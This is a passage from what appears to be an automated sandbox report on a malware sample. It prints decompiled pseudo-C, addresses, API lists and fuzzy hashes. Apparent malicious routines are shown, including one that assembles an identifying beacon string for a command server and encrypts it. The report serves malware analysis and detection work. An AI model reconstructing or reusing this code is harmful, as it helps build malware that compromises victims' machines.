							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x8ca380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x8ca3c8 = 1;
										__eflags =  *0x8ca3c8;
										if( *0x8ca3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x8ca380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x8ca3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x8ca380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x8ca388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x8ca384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x8ca388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x8ca388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x8ca3c8 = 1;
							__eflags =  *0x8ca3c8;
							if( *0x8ca3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x8ca388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x8ca388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x8ca3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x8ca388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x8ca380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x8ca388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x8ca388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x008c852b
0x008c852e
0x008c8534
0x008c8552
0x00000000
0x008c8552
0x008c853c
0x008c8545
0x008c854b
0x008c855a
0x008c855d
0x008c8560
0x008c856a
0x008c856a
0x008c856c
0x008c856f
0x008c8571
0x008c8571
0x008c8573
0x008c8576
0x00000000
0x00000000
0x008c8578
0x008c857a
0x008c85e0
0x008c85e0
0x008c873e
0x00000000
0x008c873e
0x008c857c
0x008c857c
0x008c8580
0x008c8582
0x008c8582
0x008c8582
0x008c8582
0x008c8585
0x008c8586
0x008c8589
0x008c8589
0x008c858d
0x008c8591
0x008c859f
0x008c859f
0x008c85a7
0x008c85ad
0x008c85af
0x008c85b1
0x008c85c1
0x008c85ce
0x008c85d2
0x008c85d7
0x008c85d9
0x008c8657
0x008c8657
0x008c85db
0x008c85db
0x008c85db
0x008c8659
0x008c865b
0x008c873c
0x008c873c
0x00000000
0x008c8661
0x008c8661
0x008c8668
0x00000000
0x00000000
0x008c866e
0x008c8672
0x008c86ce
0x008c86d0
0x008c86d8
0x008c86da
0x008c86dc
0x00000000
0x00000000
0x008c86de
0x008c86e4
0x008c86e6
0x008c86e8
0x008c86fd
0x008c86fd
0x008c86ff
0x008c872e
0x008c8735
0x00000000
0x008c8735
0x008c8703
0x008c8704
0x008c8706
0x008c8708
0x008c8708
0x008c870a
0x008c870c
0x008c870e
0x008c8722
0x008c8722
0x008c8725
0x008c8727
0x008c8727
0x008c8728
0x008c8728
0x00000000
0x008c8710
0x008c8710
0x008c8710
0x008c8719
0x008c871a
0x008c871c
0x008c871e
0x008c871e
0x00000000
0x008c8710
0x008c870e
0x008c86ea
0x008c86f1
0x008c86f1
0x008c86f3
0x00000000
0x00000000
0x008c86f5
0x008c86f6
0x008c86f9
0x008c86fb
0x00000000
0x00000000
0x00000000
0x008c86fb
0x00000000
0x008c86f1
0x008c8674
0x008c8677
0x008c867c
0x00000000
0x00000000
0x008c8685
0x008c8687
0x008c868d
0x00000000
0x00000000
0x008c8693
0x008c8699
0x00000000
0x00000000
0x008c869f
0x008c86a1
0x008c86aa
0x008c86ae
0x00000000
0x00000000
0x008c86b4
0x008c86b7
0x008c86b9
0x00000000
0x00000000
0x008c86c0
0x008c86c2
0x00000000
0x00000000
0x008c86c4
0x008c86c8
0x00000000
0x00000000
0x00000000
0x008c86c8
0x00000000
0x00000000
0x00000000
0x008c85b3
0x008c85b3
0x008c85b3
0x008c85ba
0x00000000
0x00000000
0x008c85bc
0x008c85bd
0x008c85bf
0x00000000
0x00000000
0x00000000
0x008c85bf
0x008c85e7
0x008c85e9
0x00000000
0x00000000
0x008c85f9
0x008c85fb
0x008c85fd
0x00000000
0x00000000
0x008c8603
0x008c860a
0x008c8636
0x008c8636
0x008c8638
0x008c863a
0x008c864e
0x008c8650
0x00000000
0x00000000
0x00000000
0x00000000
0x008c863c
0x008c863c
0x008c863c
0x008c8645
0x008c8646
0x008c8648
0x008c864a
0x008c864a
0x00000000
0x008c863c
0x008c860c
0x008c860c
0x008c860f
0x008c8611
0x008c8623
0x008c8623
0x008c8626
0x008c8628
0x008c8628
0x008c8629
0x008c8629
0x008c862f
0x008c862f
0x00000000
0x00000000
0x00000000
0x00000000
0x008c8613
0x008c8613
0x008c8613
0x008c861a
0x00000000
0x00000000
0x008c861c
0x008c861c
0x008c861d
0x00000000
0x00000000
0x00000000
0x008c861d
0x008c861f
0x008c8621
0x008c8634
0x00000000
0x00000000
0x00000000
0x008c8634
0x00000000
0x008c8621
0x008c8593
0x008c8596
0x008c8599
0x00000000
0x00000000
0x008c859b
0x008c859d
0x00000000
0x00000000
0x00000000
0x008c859d
0x008c8562
0x008c8564
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 008C85D2

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 979e7b9d8ec69aac92c4b51f476e680046ac7c3adfc47545f65d2773c084b65b
Instruction ID: 0f701908c22db4f5aa8b31fce68a6c4e77031424d8871a0b5551e30efc930e1b
Opcode Fuzzy Hash: 979e7b9d8ec69aac92c4b51f476e680046ac7c3adfc47545f65d2773c084b65b
Instruction Fuzzy Hash: 8961BF3168064ACFDB29CF28C8A4F6973B1FB95398F34852DE846C7695EF71DC428641

Uniqueness

Uniqueness Score: -1.00%

Function 008C82FC Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E008C82FC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E008C8467(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E008C8521(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E008C840C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E008C8467(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E008C8503(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x008c8300
0x008c8301
0x008c8302
0x008c8305
0x008c8307
0x008c830a
0x008c830b
0x008c830d
0x008c830e
0x008c830f
0x008c8312
0x008c831c
0x008c83cd
0x008c83d4
0x008c83dd
0x008c8322
0x008c8322
0x008c8328
0x008c832e
0x008c8331
0x008c8334
0x008c8338
0x008c833d
0x008c8342
0x008c83c2
0x00000000
0x008c8344
0x008c8344
0x008c8350
0x008c8352
0x008c83ad
0x008c83ad
0x008c83b3
0x00000000
0x008c8354
0x008c8363
0x008c8365
0x008c8366
0x008c8367
0x008c836a
0x008c836a
0x008c836c
0x00000000
0x008c836e
0x008c836e
0x008c83b8
0x008c8370
0x008c8370
0x008c8374
0x008c837c
0x008c8381
0x008c8386
0x008c8392
0x008c839a
0x008c83a1
0x008c83a7
0x008c83ab
0x00000000
0x008c83ab
0x008c836e
0x008c836c
0x00000000
0x008c8352
0x008c83c6
0x008c83c6
0x008c83c6
0x008c8342
0x008c83e2
0x008c83e9

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 166d8b46a9772ff1a73fb8e6cbd4612ad226426384fce493932e86a8d6c5f475
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 86219C72940204DFCB14EF68C880AABBBB5FB44310B4A856CA815DB245EB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 008C6CA4 Relevance: 37.8, APIs: 25, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E008C6CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x8ca018; // 0x1228dd1
				asm("bswap eax");
				_t70 =  *0x8ca014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x8ca010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x8ca00c; // 0xeec43f25
				asm("bswap eax");
				_t73 =  *0x8ca348; // 0xa3d5a8
				_t3 = _t73 + 0x8cb62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x8ca02c,  *0x8ca004, _t68);
				_t76 = E008C1308();
				_t77 =  *0x8ca348; // 0xa3d5a8
				_t4 = _t77 + 0x8cb66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x8ca348; // 0xa3d5a8
					_t8 = _t148 + 0x8cb676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x8ca348; // 0xa3d5a8
				_t10 = _t81 + 0x8cb78e; // 0x1308d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x8cb2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x8ca36c; // 0x13095b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x8ca348; // 0xa3d5a8
					_t16 = _t144 + 0x8cb889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E008C3DE0(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x8ca348; // 0xa3d5a8
					_t19 = _t139 + 0x8cb8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x8ca2d8, 0, _a40);
				}
				_t87 = E008C3ACA();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x8ca348; // 0xa3d5a8
					_t23 = _t135 + 0x8cb8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x8ca2d8, 0, _a40);
				}
				_t166 =  *0x8ca3cc; // 0x1309600
				_t89 = E008C4B69(0x8ca00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x8ca2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x8ca2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x8ca2d8, _t172, _a8);
						goto L30;
					}
					E008C53AE(GetTickCount());
					_t96 =  *0x8ca3cc; // 0x1309600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x8ca3cc; // 0x1309600
					__imp__(_t100 + 0x40);
					_t102 =  *0x8ca3cc; // 0x1309600
					_t168 = E008C2281(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x8ca2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x8c9280);
					_push(_t168);
					_t108 = E008C6311();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x8ca2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E008C3D2E( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E008C14C6();
						L26:
						HeapFree( *0x8ca2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E008C7446(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E008C1335(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E008C789E(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E008C5F92(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E008C789E(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x008c6ca4
0x008c6ca4
0x008c6ca8
0x008c6caf
0x008c6cb9
0x008c6cbb
0x008c6cbb
0x008c6cc8
0x008c6cd3
0x008c6cd6
0x008c6ce1
0x008c6ce4
0x008c6ce9
0x008c6cec
0x008c6cf1
0x008c6cf4
0x008c6d00
0x008c6d0d
0x008c6d0f
0x008c6d15
0x008c6d1a
0x008c6d25
0x008c6d27
0x008c6d2a
0x008c6d31
0x008c6d33
0x008c6d3c
0x008c6d47
0x008c6d49
0x008c6d4c
0x008c6d4c
0x008c6d4e
0x008c6d53
0x008c6d53
0x008c6d5b
0x008c6d5f
0x008c6d65
0x008c6d70
0x008c6d72
0x008c6d77
0x008c6d7c
0x008c6d7f
0x008c6d84
0x008c6d8f
0x008c6d91
0x008c6d94
0x008c6d94
0x008c6d96
0x008c6da1
0x008c6da7
0x008c6daa
0x008c6daf
0x008c6dba
0x008c6dbc
0x008c6dc3
0x008c6dcd
0x008c6dcd
0x008c6dcf
0x008c6dd4
0x008c6dda
0x008c6ddd
0x008c6de2
0x008c6dec
0x008c6dee
0x008c6dfd
0x008c6dfd
0x008c6dff
0x008c6e0d
0x008c6e12
0x008c6e14
0x008c6e1a
0x008c6ffa
0x008c7002
0x008c700f
0x008c6e20
0x008c6e2c
0x008c6e32
0x008c6e38
0x008c6fed
0x008c6ff8
0x00000000
0x008c6ff8
0x008c6e44
0x008c6e49
0x008c6e52
0x008c6e63
0x008c6e67
0x008c6e70
0x008c6e76
0x008c6e83
0x008c6e90
0x008c6e96
0x008c6fe0
0x008c6feb
0x00000000
0x008c6feb
0x008c6ea2
0x008c6ea8
0x008c6ea9
0x008c6eae
0x008c6eb4
0x008c6fd6
0x008c6fde
0x00000000
0x008c6fde
0x008c6ebe
0x008c6ec5
0x008c6ecf
0x008c6ed5
0x008c6edf
0x008c6ef1
0x008c6ef3
0x008c6ef9
0x008c7012
0x008c6fc1
0x008c6fc1
0x008c6fc6
0x008c6fd2
0x008c6fd4
0x00000000
0x008c6fd4
0x008c6f04
0x008c6f09
0x008c6f0f
0x008c6f1a
0x008c6f25
0x008c6f29
0x008c6f2f
0x008c6f35
0x008c6f3b
0x008c6f3e
0x008c6f44
0x008c6f47
0x008c6f4c
0x008c6f50
0x008c6f50
0x008c6f5d
0x008c6f6b
0x008c6f70
0x008c6f72
0x008c6f78
0x008c6f7e
0x008c6f80
0x008c6f85
0x008c6f89
0x008c6fa5
0x008c6fa5
0x008c6f78
0x00000000
0x008c6f5f
0x008c6f64
0x008c6fa7
0x008c6fab
0x008c6fb5
0x00000000
0x00000000
0x00000000
0x00000000
0x008c6fb5
0x008c6f66
0x00000000
0x008c6f66
0x008c6f5d

APIs

GetTickCount.KERNEL32 ref: 008C6CBB
wsprintfA.USER32 ref: 008C6D08
wsprintfA.USER32 ref: 008C6D25
wsprintfA.USER32 ref: 008C6D47
wsprintfA.USER32 ref: 008C6D6E
wsprintfA.USER32 ref: 008C6D8F
wsprintfA.USER32 ref: 008C6DBA
HeapFree.KERNEL32(00000000,?), ref: 008C6DCD
wsprintfA.USER32 ref: 008C6DEC
HeapFree.KERNEL32(00000000,?), ref: 008C6DFD

Part of subcall function 008C4B69: RtlEnterCriticalSection.NTDLL(013095C0), ref: 008C4B85
Part of subcall function 008C4B69: RtlLeaveCriticalSection.NTDLL(013095C0), ref: 008C4BA3

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 008C6E2C
GetTickCount.KERNEL32 ref: 008C6E3E
RtlEnterCriticalSection.NTDLL(013095C0), ref: 008C6E52
RtlLeaveCriticalSection.NTDLL(013095C0), ref: 008C6E70

Part of subcall function 008C2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22AC
Part of subcall function 008C2281: lstrlen.KERNEL32(00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22B4
Part of subcall function 008C2281: strcpy.NTDLL ref: 008C22CB
Part of subcall function 008C2281: lstrcat.KERNEL32(00000000,00000000), ref: 008C22D6
Part of subcall function 008C2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C22F3

StrTrimA.SHLWAPI(00000000,008C9280,?,01309600), ref: 008C6EA2

Part of subcall function 008C6311: lstrlen.KERNEL32(01309CE0,00000000,00000000,00000000,008C385C,00000000), ref: 008C6321
Part of subcall function 008C6311: lstrlen.KERNEL32(?), ref: 008C6329
Part of subcall function 008C6311: lstrcpy.KERNEL32(00000000,01309CE0), ref: 008C633D
Part of subcall function 008C6311: lstrcat.KERNEL32(00000000,?), ref: 008C6348

lstrcpy.KERNEL32(00000000,?), ref: 008C6EC5
lstrcpy.KERNEL32(?,?), ref: 008C6ECF
lstrcat.KERNEL32(?,?), ref: 008C6EDF
lstrcat.KERNEL32(?,00000000), ref: 008C6EE6

Part of subcall function 008C3D2E: lstrlen.KERNEL32(?,00000000,01309D08,00000000,008C695F,01309F2B,69B25F44,?,?,?,?,69B25F44,00000005,008CA00C,4D283A53,?), ref: 008C3D35
Part of subcall function 008C3D2E: mbstowcs.NTDLL ref: 008C3D5E
Part of subcall function 008C3D2E: memset.NTDLL ref: 008C3D70

wcstombs.NTDLL ref: 008C6F89

Part of subcall function 008C1335: SysAllocString.OLEAUT32(?), ref: 008C1370

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

HeapFree.KERNEL32(00000000,?), ref: 008C6FD2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 008C6FDE
HeapFree.KERNEL32(00000000,?,?,01309600), ref: 008C6FEB
HeapFree.KERNEL32(00000000,?), ref: 008C6FF8
HeapFree.KERNEL32(00000000,?), ref: 008C7002

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 1185349883-0
Opcode ID: 7e9374771f7351f53db1d2caacd0ba563f2c5ca70837501070c900093dc9030e
Instruction ID: 1fa0bd27c3b3320f237f467d541a56c7b8639e6240b257934fc500987a0feb86
Opcode Fuzzy Hash: 7e9374771f7351f53db1d2caacd0ba563f2c5ca70837501070c900093dc9030e
Instruction Fuzzy Hash: 2BA16771504618AFC711AF68DC89E6A7BF8FF88758F05092CF889D7221DB32D855CB62

Uniqueness

Uniqueness Score: -1.00%

Function 008C41C5 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E008C41C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
